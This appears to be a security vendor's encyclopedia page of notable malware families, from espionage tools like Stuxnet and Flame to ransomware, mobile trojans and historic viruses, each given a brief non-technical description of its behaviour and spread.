Threat Descriptions

Notable threats

Over the years, some threats have gained infamy for being technological or historical milestones.

Some were the first to introduce a novel feature or technique. Others were able to infect a system, program or institution that was considered 'impregnable' at the time. And a few caused a considerable amount of annoyance or disruption to a lot of users.

Listed below are just a small sample of the most notable malware we've seen so far.

These programs are known for being used in targeted espionage campaigns focused government, military or industrial organizations.


Backdoor:W32/BlackEnergy is a crimeware toolkit that has been modified for use in information gathering in advanced persistent threat (APT) atttacks.


Backdoor:W32/Duqu silently installs files on the infected system, then collects and forwards the confidential information from the system to a remote Command and Control (CC) server. Duqu is reportedly targeted to specific organizations, possibly with a view to collecting specific information that could be used for a later attack.


Havex is a Remote Access Tool (RAT) used in targeted attacks. Havex is known to have been used in attacks targeted against various industrial sectors, particularly the energy sector. Variants seen circulating in the spring of 2014 were modified to target organizations involved in developing or using industrial applications or appliances.


Backdoor:W32/Moudoor is a derivative of the notorious Gh0st Remote Access Tool (RAT) that is notable for being a favored tool of a cyberespionage group that has been working since 2010 and targeting industries such as financial services, government departments and education facilities around the world.


Backdoor:W32/OnionDuke (both A and B variants) are DLL files dropped by Trojan-Dropper:W32/OnionDuke and used to download and execute additional malicious components on the affected system.


Flame is a sophisticated information-gathering program used in targeted cyber-attacks against organizations and nation states in the Middle East.


Rootkit:W32/Regin is a complex espionage toolkit used to keep itself and other malicious components from being detected on an infected system. This malware has reportedly been used to target a variety of organizations around the world.


Trojan-Dropper:W32/CosmicDuke steals information from an infected system using keylogging, screen captures and stealing file and clipboard data. Harvested data is forwarded to a remote server via FTP.


Trojan-Dropper:W32/Stuxnet automatically executes itself and drops files onto the system by exploiting a vulnerability in various Windows versions (CVE-2010-2568) that allows malicious code to run when a specially crafted shortcut icon is displayed. This malware appears to be targeted to businesses using Siemens >SIMATIC WinCC database applications, as its payload involves data theft from these resources.

Ransomware extorts money from users by taking control of their devices or data, then demanding a ransom payment to restore the affected device or content. For more about such threats, see Article: Crypto-ransomware and Article:Removing police-themed ransomware.


Petya is unusual because it encrypts the computer's Master Boot Record (MBR). It then demands payment of a ransom in order to obtain the decryption key needed to restore normal accesss.


Users typically encounter TeslaCrypt crypto-ransomware by being exposed to an exploit kit (usually by visiting a compromised website, or by being redirected to a malicious one). If the kit successfully exploits the user's machine, it will download the ransomware.


This crypto-ransomware encrypt files stored on the machine. Users typically encounter Locky ransomware by either being exposed to an exploit kit or via a spam email message with a file attachment.


This crypto-ransomware encrypts files on the machine and demands payment in return for the decryption key needed to restore the affected content.


Cryptolocker encrypts files on the compromised computer and demands a ransom to provide the decryption key needed to decrypt the files.


This crypto-ransomware encrypts files on the affected machine and demands payment in return for the decryption key needed to restore the affected content.


Trojan:Android/SLocker.A is reportedly the first Android ransomware that uses file encryption. It is also noted for its use of the TOR anonymizing network to communicate with its controller.


Reveton is 'police-themed' ransomware that appears to 'lock' the user's computer, and displays a fake notice, allegedly from a local law enforcement authority.


Browlock is 'police-themed' ransomware which displays a 'lock screen' purportedly from a local or federal law enforcement authority, claiming that the machine has been locked and encrypted due to 'illegal activities'. A 'fine' is then demanded to restore the system.

Crimeware programs such as these are used by their controllers to steal something of value from the user, whether it be money, data or control of the computer or mobile device. For more about such threats, see Article: Botnets and Article: Exploit Kits.


Exploit:Java/Blackhole identifies a Java class module used as part of an exploit kit known as Blackhole.


FlashPack is an exploit kit that attempts to exploit vulnerabilities in a user's computer or mobile device (or in the programs installed on it). If successful, FlashPack will then download additional malware onto the compromised device.


SweetOrange is an exploit kit that runs various exploits against the user's computer in order to probe for any vulnerabilities present in programs installed on the machine, or in the computer's operating system itself; if the exploit(s) are successful, then the user's machine may be compromised and exposed to further intrusion.


Rootkit:W32/Necurs is a standalone malware that was first seen in 2011, but gained more prominence once it started being used in the Gameover Zeus botnet.


Rootkit:W32/ZAccess constantly displays advertisements on the infected machine and may silently contact remote servers to retrieve additional advertising information.


Trojan:W32/Zbot (also known as Zeus or Wsnpoem) is a large family of malware that steals information from an infected system.


Trojan:W32/BandarChor is ransomware that steals control of the user's machine or data, then demands a payment from the user to restore normal access to the ransomed content or system.


Trojan:W32/Cryptowall is a ransomware that silently encrypts files on the user's machine and demands a ransom to provide the decryption key needed to decrypt the files.


Trojan:W32/DNSChanger will change the infected system's Domain Name Server (DNS) settings in order to divert traffic to unsolicited, and potentially illegal sites.


Virus:W32/Ramnit is a family of viruses that infect EXE, DLL and HTML files found on the computer. Depending on the variant, Ramnit-infected machines can also be enslaved in a botnet.


Virus:W32/Sality refers to a large family of viruses that infect executable files.

Though relatively new, Android malware has been developing rapidly, with new features or behavior emerging in rapid succession on the platform.


Exploit:Android/GingerBreak is a piece of code that exploits a vulnerability (CVE-2011-1823) in Android operating systems before version 2.3.4 to gain root privileges on the affected device.


HtcLoggers.A is a preinstalled application that might leak confidential information to other applications.


Exploit:Android/Masterkey identifies code designed to exploit a known vulnerability in the way the Android operation system verifies the authenticity of an app.


DroidRooter is a family of binary exploits that is used to gain root privilege on an Android device.


DroidRooter is a family of binary exploits that is used to gain root privilege on an Android device.


Cracker.A is a tool that can be used to override the security policy in Microsoft Exchange corporate email service.


LoicDos.A is a program that turns an infected device into a bot, which is used to perform denial of service (DoS) attack on a targeted server.


MemPoDroid.A is a tool for exploiting the mem_write function in Android Linux kernel, which upon successful exploitation, could grant an attacker a major access to a compromised device.


SMBCheck.A is a tool that checks whether a vulnerable SMBv2 server exists on a system running on Microsoft Windows operating system.


TattooHack.A is an exploit that lets user bypass a security constraint in HTC Tattoo devices.


Trojan-Downloader:Android/Boqx refers to a maliciously repackaged version of a popular gaming application.


Trojan-Downloader:Android/FakeVideo silently connects to remote sites and attempts to download additional applications onto the device.


Morepak.A connects to a remote server, and proceeds to download malicious files onto the device.


Trojan-Downloader:Android/RootSmart forwards device details to a remote server, and downloads and installs additional applications onto the compromised device.


NotCompatible.A infects a device using a drive-by download method, gaining entry into the device when user visits a compromised website.


Trojan-Spy:Android/Antares collects and forwards device details to a remote server, as well as saving the information to the SD card and to a local web server that provides viewing access to the data via a web page.


Trojan-Spy:Android/Lovetrap silently sends SMS messages to premium-rate numbers, and also forwards device information to a remote server.


Trojan-Spy:Android/Smforw variants silently forward incoming SMS messages on an infected device to a remote server.


Trojan-Spy:Android/Sscul variants steal information from the affected device and forward the details to a remote server. More unusually, Sschul variants attempt to infect Windows machines linked to the device by exploiting the AutoRun feature.


Trojan-Spy:Android/Wabek.A collects phone numbers from the infected device and signs up the user for premium mobile services.

Though generally considered to be more 'secure' platforms, the operating systems produced by Apple have their own share of malicious programs.


Once installed on a Backdoor:OSX/Clientsnow allows a remote attacker to silently perform actions on the infected machine.


Backdoor:OSX/DevilRobber.A silently installs applications related to Bitcoin-mining; it may also harvest data from the infected machine and listen for additional commands from a remote user.


Backdoor:OSX/Imuler.A contacts a remote server for instructions; it may then steal files or capture a screenshot of the infected computer system, which is then forwarded to the remote server.


Backdoor:OSX/Iworm connects affected Mac OS X machines to a botnet and is capable of a executing a range of commands. At the time of writing, there have been no reports of the IWorm botnet being used for malicious activities.


Backdoor:OSX/Olyx.A connects to a remote server to receive further instructions, without knowledge or permission from the user.


Once installed on a system, Backdoor:OSX/XSLCmd wait for instructions from a remote server and execute them on the infected machine.


Backdoor:OSX/MacKontrol.A connects to a remote server to receive further instructions, without the knowledge or permission from the user.


Backdoor:OSX/Sabpab.A connects to a remote server to receive further instructions, without the knowledge or permission from the user.


Backdoor:OSX/iWorkServ.A is a trojan backdoor that installs itself on Mac OSX computers.


Backdoor:iPhoneOS/XCodeGhost identifies iOS apps that include code introduced when the software was created using a maliciously-modified version of the Xcode app creation framework.


Backdoor:iPhoneOS/Xsser is a mobile Remote Administrative Tool (RAT) that was reportedly found on iOS devices.


Exploit:iPhoneOS/CVE-2014-4377 identifies a maliciously crafted PDF document that attempts to exploit the CVE-2014-4377 vulnerability in iOS 7.1.x; successful exploitation would allow an attacker to remotely execute arbitrary code on the affected device.


Dishonest antivirus software which tricks users into buying or installing it, usually by infecting a user's computer, or by pretending the computer is infected.


Trojan-Downloader:OSX/Flashback is a family of malicious applications which when installed on a computer will download a payload from a remote site, then modify targeted webpages displayed in the web browser. Variants in the Flashback family may include additional malicious functionalities or characteristics.


Trojan-Downloader:OSX/Jahlev.A entices the user into downloading a fake video codec, which supposedly will solve an Active X object error. The downloaded file is a mountable disk image (DMG) file used by Mac OS X to install applications, and contains an installer package named "install.pkg".


Trojan-Dropper:OSX/Revir.A drops a downloader component that downloads a backdoor program onto the system, while camouflaging its activity by opening a PDF file to distract the user.


Trojan:OSX/Loosemaque.A appears to be a video game, but deletes files from the user home folder when a user plays it.



Trojan:iPhoneOS/SSLCredsThief.A listens to the outgoing SSL connections from a jailbroken iPhone in order to steal the device's Apple ID.


Trojan:iPhoneOS/Adthief.A hijacks the advertisement modules used by other installed apps to display its own advertisements.


Worm:iPhoneOS/Ikee is the first worm to target the Apple iPhone. Its most notable action involves changing the background wallpaper on the device.


Worm:iPhoneOS/Ikee.B is the second variant of the Ikee worm and the first with a clearly malicious attack.

Worm:OSX/Tored.A is a worm that propagates through infected e-mails and is capable of functioning as a backdoor and keylogger.

Unlike most malware today, which focus on the Windows operating system, the following are notable for targeting alternative platforms.


The Backdoor:Linux/Meche family covers a wide base of variants that are based on the EnergyMech IRC bot. The bot is widely used by miscreants to compromise Linux installations.


Backdoor:Linux/Shellshock.A identifies files that attempt to exploit the CVE-2014-6271 vulnerability reported in Bash software. If successfully exploited, this vulnerability could allow remote attackers to execute code on the affected system. This vulnerability affects Unix-based operating systems, including Linux and Mac OS X.


DroidRooter.A is a binary exploit that is used to gain root privilege on an Android device.


This worm is related to This worm was found on Monday the 30th of September 2002.


Adore is a worm that spreads in Linux systems using four different, known vulnerabilities already used by the Ramen and Lion worms. These vulnerabilities concern BIND named, wu-ftpd, rpc.statd and lpd services.


This virus spreads only under Linux operating system, infecting Elf-style executables. Found in the wild in February 1997, Bliss is the second known Linux virus (first being Staog).


Kork is a worm that uses the known vulnerability in lpd service to propagate from a vulnerable Linux system to another. This service is part of the default installation of Red Hat Linux 7.0.


Ramen is an Internet worm that propagates from a Linux based server to another. It works in a similar way as the Morris Worm that was widespread in 1989.


This virus spreads only under Linux operating system, infecting Elf-style executables. Found in the fall of 1996, Staog is the first known Linux virus.


Typot is a Linux trojan designed to perform distributed port scanning. One peculiarity of this trojan is that it generates TCP packets with a window size of 55808.


Virus.Win32.Bi.a is a proof-of-concept virus that infects i386 Windows Portable Executable (PE) and Linux ELF files.

Liberty (Palm)

The LIBERTY.A is a simple trojan written for the 3COM Palm platform. When activated, the trojan deletes all application files on the device.


Palm/MTX_II.A is a 'greeting card' Palm application dropped by MTX_II.A Windows virus. The Palm application itself is not malicious but it is dropped as a payload of MTX_II.A.


Obfu is a family of PHP backdoors that operate on any PHP enabled system. The variants belonging to this family are usually heavily obfuscated to prevent an outright detection of their functionality.


Backdoor:Python/Janicab.A is capable of running on both Windows and OS X machines; once installed it continuously takes screenshots and records audio, then forwards these to its command and control server.


Backdoor:Solaris/Wanukdoor.A is dropped by Worm:Solaris/Wanuk.A. It opens port 32982 which provides access to a remote user.


Exploit:PHP/Preamble is a detection for a family of various PHP scripts. The scripts are used to test whether a particular site is vulnerable for a Remote File Inclusion (RFI) exploitation.


Bluetooth-Worm:SymbOS/Cabir identifies a large family of Bluetooth-worms that runs on Symbian mobile phones that support the Series 60 platform.


Feak is a proof-of-concept worm that was created and publicly released by researchers at the University of California, Santa Barbara. The source code of the worm is also available along with the binaries on the Internet.


Trojan-Dropper:SymOS/StealWar is a family of trojan programs, which are usually distributed as malicious SIS files.


Trojan-Spy:SymbOS/Flexispy.A is a spyphone application that allows a user to monitor calls and messages on a targeted phone. The application must be manually installed on the phone in order for the program to operate.


Trojan:SymbOS/Appdisabler.A is a malicious SIS file dropper, which is dropped by the Skulls.J trojan.


Bootton.A is a trojan distributed by Trojan:SymbOS/Onehop.A over Bluetooth as a malicious SIS file named 'ILoveU.sis'.


Trojan:SymbOS/Cardblock.A is a trojanized version of the Symbian application InstantSis created by Biscompute.


Trojan:SymbOS/Doomboot.A drops corrupted system binaries and Worm:SymbOS/Commwarrior.B onto the infected device. The system files dropped by Doomboot.A cause the device to fail at the next reboot.


SymbOS/RommWar is a malicious SIS trojan that installs a malfunctioning system component that causes the phone to freeze, requiring a restart.


Trojan:SymbOS/Singlejump is a family of trojans that infect devices running the Symbian operating system. On execution, variants in the family replace built-in and third party applications on the device with components that reset the phone if launched.


Trojan:SymbOS/Skulls is distributed in a malicious SIS file named "Extended theme.SIS", allegedly a theme manager for Nokia 7610 smart phone (authored by "Tee-222").


Trojan:SymbOS/Romride is a family of trojans that install malfunctioning system configuration components on the device. When the affected device is started, the phone may fail to complete startup.


Variants in the Worm:SymbOS/Commwarrior family are worms that infect devices running the Symbian S60 2nd Edition operating system. Commwarrior can propagate by over both Bluetooth and Multimedia Message (MMS) networks.

These threats were milestones in the history of malicious computer programming, usually for introducing new features or ways of spreading. Some also became noted in mainstream media at the time for causing major epidemics.


The Aliz worm became widely spread in the end of November 2001. The worm activates automatically while reading an infected email message.


Email-Worm:W32/Nyxem propagates through infectious e-mail file attachments. It is also capable of spreading over a local network. Once installed on a computer, the worm can kill the processes of several applications, as well as preventing other malware from running. Myxem can also perform a Denial of Service (DoS) attack.


Lovsan is a network worm that spreads by exploiting the RPC/DCOM (MS03-026) vulnerability in Windows.


Nimda is a complex virus with a mass mailing worm component which spreads itself in e-mail attachments named README.EXE. It affects Windows 95, Windows 98, Windows Me, Windows NT 4 and Windows 2000 users.


Net-Worm:W32/Sasser refers to a small family of worms that spread to new hosts over the Internet by targeting the known MS04-011 (LSASS) vulnerability, which is caused by a buffer overrun in the Local Security Authority Subsystem Service.


Stoned.Angelina was reported to be in the wild in Finland in November 1994. In October 1995 it was found on new Seagate 5850 (850 MB) IDE hard disks.


The CIH virus was first located in Taiwan in early June 1998. After that, it has been confirmed to be in the wild worldwide. It has been among the ten most common viruses for several months. CIH has been spreading very quickly as it has been distributed through pirated software.


Virus:W97M/Concept also known as Word Prank Macro or WW6Macro - is a macro virus which has been written with the Microsoft Word v6.x macro language. It has been reported in several countries, and seems to have no trouble propagating in the wild.WM/Concept used to be extremely widespread during 1995-1997. Nowadays, it is almost (but not completely) extinct.


Slapper is a network worm that spreads on Linux machines by using a flaw discovered in August 2002 in OpenSSL libraries. The worm was found in Eastern Europe late on Friday September 13th 2002.


Worm:VBS/Onthefly (also known as VBS/VBSWG) is an encrypted Visual Basic Script worm which spreads itself through mass-mailing via the Microsoft Outlook application.


A standalone malicious program which uses computer or network resources to make complete copies of itself.


Worm:W32/Netsky refers to a large family of worms which spread in infectious files attached to fake e-mail messages. Netsky was originally named Moodoom, or I-Worm.Moodoom.


Worm:W32/Slammer sparked off a major epidemic in January, 2003. Slammer exploited a buffer overflow vulnerability in Microsoft SQL server 2000 in order to propagate.


The Sobig worm was found in the wild on January 9th 2003. The worm spreads via email and network shared drives. It also tries to download other files from web pages located on a Geocities site.


A new variant of Worm:W32/Sobig, known as Sobig.F was first found on August 19th, 2003 and it is spreading in the wild.


Brain is possibly the oldest virus known on the DOS platform, as it was first detected in January '86.


Email-Worm:W32/Sober disguises itself as a security warning for a possible new worm and a fix coming from an Anti-Virus company. The worm uses attachment names such as anti_virusdoc.pif, check-patch.bat, playme.exe.


The Win95/Marburg virus got widespread circulation in August 1998, when it was included on the master CD of the popular MGM/EA PC CD-ROM game "Wargames".

Morris Worm

Morris Worm was a Unix-based worm program which was widespread in 1989.


The Ping-Pong virus (also called "Bouncing Ball" or "Italian") was probably the most common and best known boot sector virus for a while, although the Stoned virus now outnumbers it.


Virus:Boot/Ripper infects floppy disk boot records and hard disk Master Boot Records (MBRs). The virus is encrypted with a variable key, which is quite rare among boot sector viruses.


The Stoned.Monkey virus was first discovered in Edmonton, Canada, in the year 1991. The virus spread quickly to USA, Australia and UK. Monkey is one of the most common boot sector viruses.


Elkern is a low-polymorphic cavity infector virus with network spreading capabilities. The virus first appeared on 25th-26th of October 2001.


Virus:Boot/Stoned is a simple virus that seems to have been designed to be harmless. Due to a mistake however, it did not quite work out that way. Stone is able to infect the boot sectors of floppy disks. The virus has spawned a large number of variants.Stoned was one of the most widespread viruses in existence.


Virus:W97M/Walker, also known as Virus:W97M/Satellite, is a Word macro virus with extraordinary functions.


Worm:SymbOS/Yxe is the first malicious software to target Symbian S60 3rd Edition Phones.


This is original Code Red web worm (the A variant) found originally in July 2001.


CodeRed.F is almost identical to CodeRed II, with just two bytes changed. CodeRed II stopped spreading in in the end of 2002 - the change in CodeRed.F changes this and enables it to spread forever.


Magistr is a very dangerous memory resident Win32 worm combined with virus infection routines. It was found in-the-wild in the middle of March 2001.


This is the first worm to use Adobe Acrobat PDF format as a platform. However, it only works under the full 'developer' version of Acrobat. The common Acrobat Reader program is not affected by this worm.


Worm:W32/Welchi is an unusual malware in that it attempts to disinfect the computer system from Worm:W32/Lovsan infections. It also attempts to patch a vulnerability used by the Lovsan worm to propagate.

Submit a Sample

Suspect a file or URL was wrongly detected? Send it to our Labs for further analysis

Submit a Sample


What is a Trojan and why is it harmful? Learn more about trojans and how they work

Read More